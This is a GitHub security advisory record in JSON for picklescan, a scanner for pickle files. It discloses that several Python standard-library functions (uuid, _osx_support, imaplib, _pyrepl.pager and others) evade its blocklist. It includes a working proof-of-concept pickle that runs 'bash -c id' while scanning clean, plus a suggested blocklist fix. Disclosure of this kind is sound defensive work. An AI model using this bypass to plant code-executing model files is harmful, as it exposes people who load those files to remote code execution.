-
Notifications
You must be signed in to change notification settings - Fork 652
Expand file tree
/
Copy pathGHSA-g38g-8gr9-h9xp.json
More file actions
68 lines (68 loc) · 5.94 KB
/
Copy pathGHSA-g38g-8gr9-h9xp.json
File metadata and controls
68 lines (68 loc) · 5.94 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
{
"schema_version": "1.4.0",
"id": "GHSA-g38g-8gr9-h9xp",
"modified": "2026-03-03T20:05:26Z",
"published": "2026-03-03T20:05:26Z",
"aliases": [],
"summary": "PickleScan has multiple stdlib modules with direct RCE not in blocklist",
"details": "## Summary\n\npicklescan v1.0.3 (latest) does not block at least 7 Python standard library modules that provide direct arbitrary command execution or code evaluation. A malicious pickle file importing these modules is reported as having 0 issues (CLEAN scan). This enables remote code execution that bypasses picklescan entirely.\n\n## Severity\n\n**Critical** (CVSS 9.8) — Direct RCE with zero scanner detection. Affects all deployments relying on picklescan, including HuggingFace Hub.\n\n## Affected Versions\n\n- picklescan <= 1.0.3 (all versions including latest)\n\n## Details\n\n### Unblocked RCE Modules\n\n| Module | Function | RCE Mechanism | picklescan Result |\n|--------|----------|--------------|-------------------|\n| `uuid` | `_get_command_stdout(cmd, *args)` | `subprocess.Popen((cmd,) + args)` | CLEAN |\n| `_osx_support` | `_read_output(cmdstring)` | `os.system()` via temp file | CLEAN |\n| `_osx_support` | `_find_build_tool(toolname)` | Command injection via `%s` | CLEAN |\n| `_aix_support` | `_read_cmd_output(cmdstring)` | `os.system()` | CLEAN |\n| `_pyrepl.pager` | `pipe_pager(text, cmd)` | `subprocess.Popen(cmd, shell=True)` | CLEAN |\n| `_pyrepl.pager` | `tempfile_pager(text, cmd)` | `os.system(cmd + ...)` | CLEAN |\n| `imaplib` | `IMAP4_stream(command)` | `subprocess.Popen(command, shell=True)` | CLEAN |\n| `test.support.script_helper` | `assert_python_ok(*args)` | Spawns `python` subprocess | CLEAN |\n\nAll 8 functions are in Python's standard library and importable on all platforms.\n\n### Scanner Output\n\n```\n$ picklescan -p uuid_rce.pkl\nNo issues found.\n\n$ picklescan -p aix_rce.pkl\nNo issues found.\n\n$ picklescan -p imaplib_rce.pkl\nNo issues found.\n```\n\nMeanwhile:\n```\n$ python3 -c \"import pickle; pickle.loads(open('uuid_rce.pkl','rb').read())\"\nuid=501(user) gid=20(staff) groups=20(staff),501(access),12(everyone)\n```\n\n### Blocklist Analysis\n\npicklescan v1.0.3's `_unsafe_globals` dict (scanner.py line 120-219) contains ~60 entries. None of the following modules appear:\n\n- `uuid` — not blocked\n- `_osx_support` — not blocked\n- `_aix_support` — not blocked\n- `_pyrepl` — not blocked\n- `_pyrepl.pager` — not blocked (parent wildcard doesn't apply since `_pyrepl` isn't blocked)\n- `imaplib` — not blocked\n- `test` — not blocked\n- `test.support` — not blocked\n- `test.support.script_helper` — not blocked\n\n### Proof of Concept\n\n```python\nimport struct, io, pickle\n\ndef sbu(s):\n b = s.encode()\n return b\"\\x8c\" + struct.pack(\"<B\", len(b)) + b\n\n# uuid._get_command_stdout — arbitrary command execution\npayload = (\n b\"\\x80\\x04\\x95\" + struct.pack(\"<Q\", 55)\n + sbu(\"uuid\") + sbu(\"_get_command_stdout\") + b\"\\x93\"\n + sbu(\"bash\") + sbu(\"-c\") + sbu(\"id\")\n + b\"\\x87\" + b\"R\" # TUPLE3 + REDUCE\n + b\".\" # STOP\n)\n\n# Scan: 0 issues\nfrom picklescan.scanner import scan_pickle_bytes\nresult = scan_pickle_bytes(io.BytesIO(payload), \"test.pkl\")\nassert result.issues_count == 0 # CLEAN\n\n# Execute: runs `id` command\npickle.loads(payload)\n```\n\n### Tested Against\n\n- picklescan v1.0.3 (commit b999763, Feb 15 2026) — latest release\n- picklescan v0.0.21 — same result (modules never blocked in any version)\n\n## Impact\n\nAny system using picklescan for pickle safety validation is vulnerable. This includes:\n\n- **HuggingFace Hub** — uses picklescan server-side to scan uploaded model files\n- **ML pipelines** — any CI/CD or loading pipeline using picklescan\n- **Model registries** — any registry relying on picklescan for safety checks\n\nAn attacker can upload a malicious model file to HuggingFace Hub that passes all picklescan checks and executes arbitrary code when loaded by a user.\n\n## Suggested Fix\n\nAdd to `_unsafe_globals` in picklescan:\n```python\n\"uuid\": \"*\",\n\"_osx_support\": \"*\",\n\"_aix_support\": \"*\",\n\"_pyrepl\": \"*\",\n\"imaplib\": {\"IMAP4_stream\"},\n\"test\": \"*\",\n```\n\n**Architectural recommendation:** The blocklist approach is fundamentally flawed — new RCE-capable stdlib functions can be discovered faster than they are blocked. Consider:\n1. Switching to an allowlist (default-deny) for permitted globals\n2. Treating ALL unknown globals as dangerous by default (currently marked \"Suspicious\" but not counted as issues)\n\n## Resources\n\n- picklescan source: `scanner.py` lines 120-219 (`_unsafe_globals`)\n- Python source: `Lib/uuid.py`, `Lib/_osx_support.py`, `Lib/_aix_support.py`, `Lib/_pyrepl/pager.py`, `Lib/imaplib.py`",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "picklescan"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.4"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-g38g-8gr9-h9xp"
},
{
"type": "PACKAGE",
"url": "https://github.com/mmaitre314/picklescan"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/releases/tag/v1.0.4"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/tree/v1.0.4"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/picklescan/1.0.4/"
}
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-693"
],
"severity": "CRITICAL",
"github_reviewed": true,
"github_reviewed_at": "2026-03-03T20:05:26Z",
"nvd_published_at": null
}
}